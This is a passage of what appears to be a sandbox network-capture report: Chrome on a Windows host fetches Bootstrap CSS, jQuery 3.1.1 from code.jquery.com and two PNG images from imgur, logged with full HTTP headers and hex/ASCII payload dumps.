padding-right: 0; padding-left: 0;
2025-03-25 16:13:12 UTC	16384	IN	Data Raw: 74 5e 3d 72 69 67 68 74 5d 20 2e 61 72 72 6f 77 2c 0d 0a 20 20 20 20 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 72 69 67 68 74 20 2e 61 72 72 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 2e 34 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 2e 38 72 65 6d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 61 75 74 6f 5b 78 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 72 69 67 68 74 5d 20 2e 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 2c 0d 0a 20 20 20 20 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 72 69 67 68 74 20 2e 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 Data Ascii: t^=right] .arrow, .bs-tooltip-right .arrow { left: 0; width: .4rem; height: .8rem } .bs-tooltip-auto[x-placement^=right] .arrow::before, .bs-tooltip-right .arrow::before { right: 0; border

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49730	151.101.66.137	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:13:14 UTC	539	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:13:14 UTC	562	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Accept-Ranges: bytes Age: 1847478 Date: Tue, 25 Mar 2025 16:13:14 GMT Via: 1.1 varnish X-Served-By: cache-lga21963-LGA X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1742919195.597204,VS0,VE1 Vary: Accept-Encoding
2025-03-25 16:13:14 UTC	1378	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
2025-03-25 16:13:14 UTC	1378	IN	Data Raw: 3e 3d 30 26 26 63 3c 62 3f 5b 74 68 69 73 5b 63 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 68 2c 73 6f 72 74 3a 63 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 63 2e 73 70 6c 69 63 65 7d 2c 72 2e 65 78 74 65 6e 64 3d 72 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 68 3d 31 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6a 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 67 26 26 28 6a 3d 67 2c 67 3d 61 72 67 75 6d 65 6e 74 73 Data Ascii: >=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject\|\|this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]\|\|{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments
2025-03-25 16:13:14 UTC	1378	IN	Data Raw: 6e 20 61 2e 6e 6f 64 65 4e 61 6d 65 26 26 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 3d 30 3b 69 66 28 77 28 61 29 29 7b 66 6f 72 28 63 3d 61 2e 6c 65 6e 67 74 68 3b 64 3c 63 3b 64 2b 2b 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 7d 65 6c 73 65 20 66 6f 72 28 64 20 69 6e 20 61 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 61 7d 2c 74 72 69 6d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 22 22 3a 28 61 2b 22 22 29 2e Data Ascii: n a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(w(a)){for(c=a.length;d<c;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").
2025-03-25 16:13:14 UTC	1378	IN	Data Raw: 61 72 72 61 79 22 3d 3d 3d 63 7c 7c 30 3d 3d 3d 62 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 62 3e 30 26 26 62 2d 31 20 69 6e 20 61 29 7d 76 61 72 20 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 70 2c 71 2c 72 2c 73 2c 74 2c 75 3d 22 73 69 7a 7a 6c 65 22 2b 31 2a 6e 65 77 20 44 61 74 65 2c 76 3d 61 2e 64 6f 63 75 6d 65 6e 74 2c 77 3d 30 2c 78 3d 30 2c 79 3d 68 61 28 29 2c 7a 3d 68 61 28 29 2c 41 3d 68 61 28 29 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 26 26 28 6c 3d 21 30 29 2c 30 7d 2c 43 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 44 3d 5b 5d 2c 45 3d 44 2e 70 6f 70 2c 46 3d 44 2e Data Ascii: array"===c\|\|0===b\|\|"number"==typeof b&&b>0&&b-1 in a)}var x=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=ha(),z=ha(),A=ha(),B=function(a,b){return a===b&&(l=!0),0},C={}.hasOwnProperty,D=[],E=D.pop,F=D.
2025-03-25 16:13:14 UTC	1378	IN	Data Raw: 70 28 22 5e 22 2b 4b 2b 22 2a 5b 3e 2b 7e 5d 7c 3a 28 65 76 65 6e 7c 6f 64 64 7c 65 71 7c 67 74 7c 6c 74 7c 6e 74 68 7c 66 69 72 73 74 7c 6c 61 73 74 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 28 3f 3a 2d 5c 5c 64 29 3f 5c 5c 64 2a 29 22 2b 4b 2b 22 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 57 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 58 3d 2f 5e 68 5c 64 24 2f 69 2c 59 3d 2f 5e 5b 5e 7b 5d 2b 5c 7b 5c 73 2a 5c 5b 6e 61 74 69 76 65 20 5c 77 2f 2c 5a 3d 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 24 3d 2f 5b 2b 7e 5d 2f 2c 5f 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 28 5b 5c 5c 64 61 Data Ascii: p("^"+K+"[>+~]\|:(even\|odd\|eq\|gt\|lt\|nth\|first\|last)(?:\$"+K+"((?:-\\d)?\\d)"+K+"\$\|)(?=[^-]\|$)","i")},W=/^(?:input\|select\|textarea\|button)$/i,X=/^h\d$/i,Y=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)\|(\w+)\|\.([\w-]+))$/,$=/[+~]/,_=new RegExp("\\\\([\\da
2025-03-25 16:13:14 UTC	1378	IN	Data Raw: 5b 33 5d 29 26 26 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 26 26 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 72 65 74 75 72 6e 20 47 2e 61 70 70 6c 79 28 64 2c 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 66 29 29 2c 64 7d 69 66 28 63 2e 71 73 61 26 26 21 41 5b 61 2b 22 20 22 5d 26 26 28 21 71 7c 7c 21 71 2e 74 65 73 74 28 61 29 29 29 7b 69 66 28 31 21 3d 3d 77 29 73 3d 62 2c 72 3d 61 3b 65 6c 73 65 20 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7b 28 6b 3d 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 6b 3d 6b 2e 72 65 70 6c 61 63 65 28 62 61 2c 63 61 29 3a 62 2e 73 65 74 Data Ascii: [3])&&c.getElementsByClassName&&b.getElementsByClassName)return G.apply(d,b.getElementsByClassName(f)),d}if(c.qsa&&!A[a+" "]&&(!q\|\|!q.test(a))){if(1!==w)s=b,r=a;else if("object"!==b.nodeName.toLowerCase()){(k=b.getAttribute("id"))?k=k.replace(ba,ca):b.set
2025-03-25 16:13:14 UTC	1378	IN	Data Raw: 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 69 73 44 69 73 61 62 6c 65 64 3d 3d 3d 61 7c 7c 62 2e 69 73 44 69 73 61 62 6c 65 64 21 3d 3d 21 61 26 26 65 61 28 62 29 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 22 6c 61 62 65 6c 22 69 6e 20 62 26 26 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 61 28 61 29 7b 72 65 74 75 72 6e 20 69 61 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 3d 2b 62 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 76 61 72 20 65 2c 66 3d 61 28 5b 5d 2c 63 2e 6c 65 6e 67 74 68 2c 62 29 2c 67 3d 66 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 67 2d 2d 29 63 5b 65 3d 66 5b 67 5d 5d 26 26 28 63 5b 65 5d 3d 21 28 64 5b 65 Data Ascii: e.disabled===a:b.disabled===a:b.isDisabled===a\|\|b.isDisabled!==!a&&ea(b)===a:b.disabled===a:"label"in b&&b.disabled===a}}function pa(a){return ia(function(b){return b=+b,ia(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e
2025-03-25 16:13:14 UTC	1378	IN	Data Raw: 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 63 26 26 63 2e 76 61 6c 75 65 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 2c 64 2c 65 2c 66 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 69 66 28 66 29 7b 69 66 28 63 3d 66 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 2c 63 26 26 63 2e 76 61 6c 75 65 Data Ascii: n function(a){var c="undefined"!=typeof a.getAttributeNode&&a.getAttributeNode("id");return c&&c.value===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c,d,e,f=b.getElementById(a);if(f){if(c=f.getAttributeNode("id"),c&&c.value
2025-03-25 16:13:14 UTC	1378	IN	Data Raw: 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 6f 70 74 69 6f 6e 2f 3e 3c 2f 73 65 6c 65 63 74 3e 22 3b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4b 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 61 2e 71 75 65 72 79 53 Data Ascii: bled='disabled'></a><select disabled='disabled'><option/></select>";var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+K+"[^$\|!~]?="),2!==a.queryS
2025-03-25 16:13:14 UTC	1378	IN	Data Raw: 44 6f 63 75 6d 65 6e 74 3d 3d 3d 76 26 26 74 28 76 2c 62 29 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3a 34 26 64 3f 2d 31 3a 31 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 63 2c 64 3d 30 2c 65 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 67 3d 5b 61 5d 2c 68 3d 5b 62 5d 3b 69 66 28 21 65 7c 7c 21 66 29 72 65 74 75 72 6e 20 61 3d 3d 3d 6e 3f 2d 31 3a 62 3d 3d 3d 6e 3f 31 3a 65 3f 2d 31 3a 66 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3b 69 66 28 65 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6c 61 28 61 2c 62 29 3b 63 3d 61 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 67 2e 75 6e Data Ascii: Document===v&&t(v,b)?1:k?I(k,a)-I(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,g=[a],h=[b];if(!e\|\|!f)return a===n?-1:b===n?1:e?-1:f?1:k?I(k,a)-I(k,b):0;if(e===f)return la(a,b);c=a;while(c=c.parentNode)g.un

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49732	199.232.196.193	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:13:15 UTC	587	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:13:15 UTC	756	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Age: 2622252 Date: Tue, 25 Mar 2025 16:13:15 GMT X-Served-By: cache-iad-kiad7000021-IAD, cache-lga21947-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 11253, 0 X-Timer: S1742919195.365456,VS0,VE2 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-25 16:13:15 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-03-25 16:13:15 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-03-25 16:13:15 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
2025-03-25 16:13:15 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-03-25 16:13:15 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49731	199.232.196.193	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:13:15 UTC	587	OUT	GET /KAb5SEy.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:13:15 UTC	757	IN	HTTP/1.1 200 OK Connection: close Content-Length: 48869 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 13:35:05 GMT ETag: "8aa14660517f5460156fccc2199cf83c" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: ZMDtIIYNSizYrfDVWXb5ZuJtkSbNLszxoUAHUCL9zZz9IlMMufkJOg== cache-control: public, max-age=31536000 Accept-Ranges: bytes Age: 2671268 Date: Tue, 25 Mar 2025 16:13:15 GMT X-Served-By: cache-iad-kjyo7100129-IAD, cache-lga21926-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 14884, 0 X-Timer: S1742919195.365125,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
